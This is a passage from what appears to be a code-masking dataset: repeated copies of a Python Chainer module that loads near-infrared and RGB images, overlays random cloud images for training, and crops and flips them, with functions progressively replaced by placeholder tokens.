::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n\n\nclass TestNIR(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, imlist_nir):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n\n def __len__(self):\n return len(self.nir)\n <function token>\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n\n\nclass TestNIR(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, imlist_nir):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n <function token>\n <function token>\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n\n\nclass TestNIR(chainer.dataset.DatasetMixin):\n <function token>\n <function token>\n <function token>\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n <function token>\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n <function token>\n <function token>\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
